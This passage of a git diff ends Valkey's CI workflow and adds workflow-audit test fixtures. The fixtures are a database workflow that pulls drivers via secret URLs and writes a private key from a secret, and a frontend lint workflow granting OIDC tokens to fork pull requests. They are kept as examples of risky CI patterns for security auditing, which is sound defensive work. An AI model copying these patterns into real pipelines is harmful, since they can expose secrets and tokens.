libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: make + run: make SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest ${{ github.event_name != 'pull_request' && '--accurate' || '' }} --verbose --clients 1 --no-latency --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --verbose --clients 1 --no-latency --dump-logs ${{github.event.inputs.test_args}} + test-macos-latest-sentinel: + runs-on: macos-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'macos') && !contains(github.event.inputs.skiptests, 'sentinel') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: make + run: make SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + test-macos-latest-cluster: + runs-on: macos-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'macos') && !contains(github.event.inputs.skiptests, 'cluster') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: make + run: make SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + build-old-macos-versions: + strategy: + fail-fast: false + matrix: + os: [macos-14] + runs-on: ${{ matrix.os }} + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'macos') + timeout-minutes: 1440 + steps: + - uses: maxim-lobanov/setup-xcode@60606e260d2fc5762a71e64e74b2174e8ea3c8bd # v1.6.0 + with: + xcode-version: latest + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: make + run: make SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + test-freebsd: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'freebsd') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: test + uses: cross-platform-actions/action@39a2a80642eca0947594ad03e4355dc3d28c617a # v0.32.0 + with: + operating_system: freebsd + environment_variables: MAKE + version: 13.2 + shell: bash + run: | + sudo pkg install -y bash gmake lang/tcl86 lang/tclX + gmake + ./runtest --single unit/keyspace --single unit/auth --single unit/networking --single unit/protocol + test-alpine-jemalloc: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'alpine') + container: alpine:latest + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - name: Build libbacktrace + run: | + apk add build-base git + cd libbacktrace && ./configure && make && make install + - name: make + run: make SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: apk add tcl procps tclx + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest ${{ github.event_name != 'pull_request' && '--accurate' || '' }} --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + test-alpine-libc-malloc: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'alpine') + container: alpine:latest + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - name: Build libbacktrace + run: | + apk add build-base git + cd libbacktrace && ./configure && make && make install + - name: make + run: make SERVER_CFLAGS='-Werror' USE_JEMALLOC=no CFLAGS=-DUSE_MALLOC_USABLE_SIZE USE_LIBBACKTRACE=yes + - name: testprep + run: apk add tcl procps tclx + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest ${{ github.event_name != 'pull_request' && '--accurate' || '' }} --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + reply-schemas-validator: + runs-on: ubuntu-latest + timeout-minutes: 1440 + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'reply-schema') + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: make + run: make SERVER_CFLAGS='-Werror -DLOG_REQ_RES' USE_LIBBACKTRACE=yes + - name: testprep + run: sudo apt-get install tcl8.6 tclx + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest --log-req-res --no-latency --dont-clean --force-resp3 --tags -slow --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --log-req-res --no-latency --dont-clean --force-resp3 --dont-pre-clean --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel --log-req-res --dont-clean --force-resp3 ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster --log-req-res --dont-clean --force-resp3 ${{github.event.inputs.cluster_test_args}} + - name: Install Python dependencies + uses: py-actions/py-dependency-install@30aa0023464ed4b5b116bd9fbdab87acf01a484e # v4.1.0 + with: + path: "./utils/req-res-validator/requirements.txt" + - name: validator + run: ./utils/req-res-log-validator.py --verbose --fail-missing-reply-schemas ${{ (!contains(github.event.inputs.skiptests, 'valkey') && !contains(github.event.inputs.skiptests, 'module') && !contains(github.event.inputs.skiptests, 'sentinel') && !contains(github.event.inputs.skiptests, 'cluster')) && (inputs.test_args || github.event.inputs.test_args || '') == '' && (inputs.cluster_test_args || github.event.inputs.cluster_test_args || '') == '' && '--fail-commands-not-all-hit' || '' }} + notify-about-job-results: + runs-on: ubuntu-latest + if: always() && github.event_name == 'schedule' && github.repository == 'valkey-io/valkey' + needs: + - test-ubuntu-jemalloc + - test-ubuntu-arm + - test-ubuntu-jemalloc-fortify + - test-ubuntu-libc-malloc + - test-ubuntu-no-malloc-usable-size + - test-ubuntu-32bit + - test-ubuntu-tls + - test-ubuntu-tls-no-tls + - test-ubuntu-io-threads + - test-ubuntu-tls-io-threads + - test-ubuntu-reclaim-cache + - test-valgrind-test + - test-valgrind-misc + - test-valgrind-no-malloc-usable-size-test + - test-valgrind-no-malloc-usable-size-misc + - test-sanitizer-address + - test-sanitizer-address-large-memory + - test-sanitizer-undefined + - test-sanitizer-undefined-large-memory + - test-sanitizer-force-defrag + - test-ubuntu-lttng + - test-rpm-distros-jemalloc + - test-rpm-distros-tls-module + - test-rpm-distros-tls-module-no-tls + - test-macos-latest + - test-macos-latest-sentinel + - test-macos-latest-cluster + - build-old-macos-versions + - test-freebsd + - test-alpine-jemalloc + - test-alpine-libc-malloc + - reply-schemas-validator + steps: + - name: Collect job status + run: | + FAILED_JOBS=() + NEEDS_JSON='${{ toJSON(needs) }}' + JOBS=($(echo "$NEEDS_JSON" | jq 'keys' | tr -d '[] ,')) + for JOB in ${JOBS[@]}; do + JOB_RESULT=$(echo "$NEEDS_JSON" | jq ".[$JOB][\"result\"]" | tr -d '"') + if [ $JOB_RESULT = "failure" ]; then + FAILED_JOBS+=($JOB) + fi + done + + if [[ ${#FAILED_JOBS[@]} -ne 0 ]]; then + echo "FAILED_JOBS=${FAILED_JOBS[@]}" >> $GITHUB_ENV + echo "STATUS=failure" >> $GITHUB_ENV + else + echo "STATUS=success" >> $GITHUB_ENV + fi + - name: Notify about results + uses: ravsamhq/notify-slack-action@042f29088bb3bdbda5b4ff7b4818466a277fa8f7 # v2.5.0 + with: + status: ${{ env.STATUS }} + notify_when: "failure" + notification_title: "Daily test run <${{github.server_url}}/${{github.repository}}/actions/runs/${{github.run_id}}|Failure>" + message_format: ":fire: Tests failed: ${{ env.FAILED_JOBS }}" + env: + SLACK_WEBHOOK_URL: ${{ secrets.SLACK_NOTIFICATIONS_WEBHOOK_URL }} diff --git a/test-fixtures/workflow-audits/real-cases/RC-08-workflow-secret-exfiltration/.github/workflows/db-pro.yaml b/test-fixtures/workflow-audits/real-cases/RC-08-workflow-secret-exfiltration/.github/workflows/db-pro.yaml new file mode 100644 index 0000000..6cd1765 --- /dev/null +++ b/test-fixtures/workflow-audits/real-cases/RC-08-workflow-secret-exfiltration/.github/workflows/db-pro.yaml @@ -0,0 +1,133 @@ +on: + push: + branches: + - master + - main + pull_request: + branches: + - master + - main + +name: DBs + Posit Pro Drivers (Linux) + +jobs: + database: + if: ${{ (github.event_name != 'pull_request') || (github.event.pull_request.head.repo.full_name == github.event.pull_request.base.repo.full_name) }} + runs-on: ubuntu-latest + + services: + oracle: + image: gvenzl/oracle-xe:21.3.0 + ports: + - 1521:1521 + env: + ORACLE_RANDOM_PASSWORD: true + ORACLE_DATABASE: test + APP_USER: RodbcR + APP_USER_PASSWORD: Password12 + options: >- + --health-cmd healthcheck.sh + --health-interval 10s + --health-timeout 5s + --health-retries 10 + + postgres: + image: postgres + ports: + - 5432:5432 + env: + POSTGRES_USER: postgres + POSTGRES_PASSWORD: password + POSTGRES_DB: test + options: --health-cmd pg_isready --health-interval 10s --health-timeout 5s --health-retries 5 + sqlserver: + image: mcr.microsoft.com/mssql/server:2017-latest-ubuntu + ports: + - 1433:1433 + env: + ACCEPT_EULA: Y + SA_PASSWORD: Password12 + + env: + ODBC_DRIVERS_VINTAGE: "PRO" + CRAN: "https://packagemanager.rstudio.com/cran/__linux__/jammy/latest" + ODBCSYSINI: ${{ github.workspace }}/.github/odbc + TNS_ADMIN: ${{ github.workspace }}/.github/odbc + GITHUB_PAT: ${{ secrets.GITHUB_TOKEN }} + + steps: + - uses: actions/checkout@v3 + + - uses: r-lib/actions/setup-r@v2 + + - name: Install Driver Manager + run: sudo apt-get install -y unixodbc-dev + + - name: Install MySQL Driver + run: | + sudo systemctl start mysql.service + mysql -uroot -h127.0.0.1 -proot -e 'CREATE DATABASE `test`;' + echo "ODBC_CS_MYSQL=dsn=ProMySQL" >> $GITHUB_ENV + mkdir -p $ODBCSYSINI/pro_drivers/mysql + touch $ODBCSYSINI/pro_drivers/mysql.tar.gz + curl ${{ secrets.PRO_DRIVER_MYSQL }} --output $ODBCSYSINI/pro_drivers/mysql.tar.gz + tar -xvzf $ODBCSYSINI/pro_drivers/mysql.tar.gz -C $ODBCSYSINI/pro_drivers/mysql + + - name: Install SQL Server Driver + run: | + echo "ODBC_CS_SQLSERVER=dsn=ProMicrosoftSQLServer;UID=SA;PWD=Password12" >> $GITHUB_ENV + mkdir -p $ODBCSYSINI/pro_drivers/sql_server + touch $ODBCSYSINI/pro_drivers/sql_server.tar.gz + curl ${{ secrets.PRO_DRIVER_SQL_SERVER }} --output $ODBCSYSINI/pro_drivers/sql_server.tar.gz + tar -xvzf $ODBCSYSINI/pro_drivers/sql_server.tar.gz -C $ODBCSYSINI/pro_drivers/sql_server + + - name: Install Oracle Driver + run: | + echo "ODBC_CS_ORACLE=dsn=ProOracle;UID=RodbcR;PWD=Password12;DBQ=test" >> $GITHUB_ENV + .github/odbc/install-oracle-driver.sh + echo "LD_LIBRARY_PATH=/opt/oracle/instantclient_21_12:$LD_LIBRARY_PATH" >> $GITHUB_ENV + mkdir -p $ODBCSYSINI/pro_drivers/oracle + touch $ODBCSYSINI/pro_drivers/oracle.tar.gz + curl ${{ secrets.PRO_DRIVER_ORACLE }} --output $ODBCSYSINI/pro_drivers/oracle.tar.gz + tar -xvzf $ODBCSYSINI/pro_drivers/oracle.tar.gz -C $ODBCSYSINI/pro_drivers/oracle + + - name: Install PostgreSQL Driver + run: | + echo "ODBC_CS_POSTGRES=dsn=ProPostgreSQL" >> $GITHUB_ENV + mkdir -p $ODBCSYSINI/pro_drivers/postgresql + touch $ODBCSYSINI/pro_drivers/postgresql.tar.gz + curl ${{ secrets.PRO_DRIVER_POSTGRESQL }} --output $ODBCSYSINI/pro_drivers/postgresql.tar.gz + tar -xvzf $ODBCSYSINI/pro_drivers/postgresql.tar.gz -C $ODBCSYSINI/pro_drivers/postgresql + + - name: Install Snowflake Driver + run: | + echo "ODBC_CS_SNOWFLAKE=dsn=Snowflake" >> $GITHUB_ENV + mkdir -p $ODBCSYSINI/pro_drivers/snowflake + touch $ODBCSYSINI/pro_drivers/snowflake.tar.gz + curl ${{ secrets.PRO_DRIVER_SNOWFLAKE }} --output $ODBCSYSINI/pro_drivers/snowflake.tar.gz + tar -xvzf $ODBCSYSINI/pro_drivers/snowflake.tar.gz -C $ODBCSYSINI/pro_drivers/snowflake + echo "Driver=$ODBCSYSINI/pro_drivers/snowflake/bin/lib/libsnowflakeodbc_sb64.so" | tee -a $ODBCSYSINI/odbc.ini + + # note that this assumes Snowflake is the last odbc.ini entry + - name: Prepare Snowflake private key + run: | + echo "${{ secrets.SNOWFLAKE_PRIVATE_KEY }}" > $ODBCSYSINI/private_key.pem + echo "PRIV_KEY_FILE=$ODBCSYSINI/private_key.pem" | tee -a $ODBCSYSINI/odbc.ini + export SNOWFLAKE_PRIVATE_KEY_EXISTS=TRUE + + - name: Install dependencies + uses: r-lib/actions/setup-r-dependencies@v2 + with: + needs: check + + - name: Install locally to avoid error with test_local() + run: | + R CMD INSTALL . + env: + LIB_DIR: /usr/lib/x86_64-linux-gnu/ + INCLUDE_DIR: /usr/include + + - name: Test + run: | + options("odbc.interruptible"=TRUE);testthat::test_local(reporter = testthat::ProgressReporter$new(max_failures = Inf, update_interval = Inf)) + shell: Rscript {0} diff --git a/test-fixtures/workflow-audits/real-cases/RC-09-workflow-oidc-untrusted-context/.github/workflows/frontend-lint.yml b/test-fixtures/workflow-audits/real-cases/RC-09-workflow-oidc-untrusted-context/.github/workflows/frontend-lint.yml new file mode 100644 index 0000000..d307705 --- /dev/null +++ b/test-fixtures/workflow-audits/real-cases/RC-09-workflow-oidc-untrusted-context/.github/workflows/frontend-lint.yml @@ -0,0 +1,329 @@ +name: Lint Frontend +on: + pull_request: + push: + branches: + - main + - release-*.*.* + +permissions: {} + +jobs: + detect-changes: + name: Detect whether code changed + runs-on: ubuntu-latest + permissions: + contents: read + outputs: + changed: ${{ steps.detect-changes.outputs.frontend }} + prettier: ${{ steps.detect-changes.outputs.frontend == 'true' || steps.detect-changes.outputs.docs == 'true' }} + changed-frontend-packages: ${{ steps.detect-changes.outputs.frontend-packages }} + changed-frontend-dependencies: ${{ steps.detect-changes.outputs.frontend-dependencies }} + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: true # required to get more history in the changed-files action + fetch-depth: 2 + - name: Detect changes + id: detect-changes + uses: ./.github/actions/change-detection + with: + self: .github/workflows/frontend-lint.yml + + lint-frontend-prettier: + needs: detect-changes + permissions: + contents: read + id-token: write + # Run this workflow only for PRs from forks; if it gets merged into `main` or `release-*`, + # the `lint-frontend-prettier-enterprise` workflow will run instead + if: github.event_name == 'pull_request' && github.event.pull_request.head.repo.fork == true && needs.detect-changes.outputs.prettier == 'true' + name: Lint + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node.js + uses: ./.github/actions/setup-node + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - run: yarn run prettier:check + - run: yarn run lint + lint-frontend-prettier-enterprise: + needs: detect-changes + permissions: + contents: read + id-token: write + # Run this workflow for non-PR events (like pushes to `main` or `release-*`) OR for internal PRs (PRs not from forks) + if: github.event_name != 'pull_request' || github.event.pull_request.head.repo.fork == false && needs.detect-changes.outputs.prettier == 'true' + name: Lint + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node.js + uses: ./.github/actions/setup-node + - name: Setup Enterprise + uses: ./.github/actions/setup-enterprise + with: + github-app-name: "grafana-ci-bot" + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - run: yarn run prettier:check + - run: yarn run lint + lint-frontend-typecheck: + needs: detect-changes + permissions: + contents: read + id-token: write + # Run this workflow only for PRs from forks; if it gets merged into `main` or `release-*`, + # the `lint-frontend-typecheck-enterprise` workflow will run instead + if: github.event_name == 'pull_request' && github.event.pull_request.head.repo.fork == true && needs.detect-changes.outputs.changed == 'true' + name: Typecheck + runs-on: ubuntu-latest + env: + NODE_OPTIONS: --max-old-space-size=8192 + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node.js + uses: ./.github/actions/setup-node + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - run: yarn run typecheck + lint-frontend-typecheck-enterprise: + needs: detect-changes + permissions: + contents: read + id-token: write + # Run this workflow for non-PR events (like pushes to `main` or `release-*`) OR for internal PRs (PRs not from forks) + if: github.event_name != 'pull_request' || github.event.pull_request.head.repo.fork == false && needs.detect-changes.outputs.changed == 'true' + name: Typecheck + runs-on: ubuntu-latest + env: + NODE_OPTIONS: --max-old-space-size=8192 + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node + uses: ./.github/actions/setup-node + - name: Setup Enterprise + uses: ./.github/actions/setup-enterprise + with: + github-app-name: "grafana-ci-bot" + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - run: yarn run typecheck + lint-frontend-api-clients: + permissions: + contents: read + id-token: write + # Run this workflow only for PRs from forks; if it gets merged into `main` or `release-*`, + # the `lint-frontend-api-clients-enterprise` workflow will run instead + if: github.event_name == 'pull_request' && github.event.pull_request.head.repo.fork == true + name: Verify API clients + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node + uses: ./.github/actions/setup-node + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - name: Generate API clients + run: | + extract_error_message='ERROR! API client generation failed!' + yarn generate-apis || (echo "${extract_error_message}" && false) + - name: Verify generated clients + run: | + uncommited_error_message="ERROR! API client generation has not been committed. Please run 'yarn generate-apis', commit the changes and push again." + file_diff="$(git diff ':!conf')" + if [ -n "$file_diff" ]; then + echo "$file_diff" + echo "${uncommited_error_message}" + exit 1 + fi + lint-frontend-openapi: + # Run this workflow for OSS only + permissions: + contents: read + id-token: write + name: Verify OpenAPI specs + runs-on: ubuntu-x64-large + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node.js + uses: ./.github/actions/setup-node + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - name: Free up disk space + run: | + sudo rm -rf /usr/local/lib/android || true + sudo rm -rf /usr/share/dotnet || true + sudo rm -rf /opt/ghc || true + sudo rm -rf /usr/local/.ghcup || true + - name: Generate OpenAPI specs + run: | + extract_error_message='ERROR! OpenAPI generation failed!' + yarn generate:openapi || (echo "${extract_error_message}" && false) + - name: Verify generated specs + run: | + git add -N . + uncommited_error_message="ERROR! OpenAPI generation has not been committed. Please run 'yarn generate:openapi', commit the changes and push again." + file_diff="$(git diff --name-only ':!conf')" + if [ -n "$file_diff" ]; then + echo "$file_diff" + echo "${uncommited_error_message}" + exit 1 + fi + lint-frontend-api-clients-enterprise: + permissions: + contents: read + id-token: write + # Run this workflow for non-PR events (like pushes to `main` or `release-*`) OR for internal PRs (PRs not from forks) + if: github.event_name != 'pull_request' || github.event.pull_request.head.repo.fork == false + name: Verify API clients (enterprise) + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node + uses: ./.github/actions/setup-node + - name: Setup Enterprise + uses: ./.github/actions/setup-enterprise + with: + github-app-name: "grafana-ci-bot" + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - name: Generate API clients + run: | + extract_error_message='ERROR! API client generation failed!' + yarn generate-apis || (echo "${extract_error_message}" && false) + - name: Verify generated clients + run: | + uncommited_error_message="ERROR! API client generation has not been committed. Please run 'yarn generate-apis', commit the changes and push again." + file_diff="$(git diff 